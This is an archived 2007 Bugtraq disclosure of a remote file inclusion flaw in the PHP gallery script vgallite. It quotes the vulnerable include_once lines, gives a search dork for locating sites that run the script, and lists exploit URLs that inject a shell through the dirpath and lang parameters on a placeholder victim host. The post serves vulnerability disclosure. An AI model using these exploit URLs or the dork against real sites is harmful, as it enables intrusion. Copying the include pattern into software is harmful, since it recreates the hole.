ALL vgallite Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ALL vgallite Remote File Include
From: RaeD@xxxxxxxxxxx
Date: 4 Aug 2007 16:00:17 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Discovred By : Hasadya Raed
----------------------------
Contact : RaeD@xxxxxxxxxxx , Hacker_Web@xxxx , Gunman_Pump@xxxxxxxxxxx
----------------------------
Greetz : Jonathan , Muts  
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File: 
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: 
include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>

Prev by Date: AL-Caricatier V.2.5 Remote File Include
Next by Date: AuraCMS [Forum Module] - Remote SQL Injection
Previous by thread: AL-Caricatier V.2.5 Remote File Include
Next by thread: AuraCMS [Forum Module] - Remote SQL Injection
Index(es):
- Date
- Thread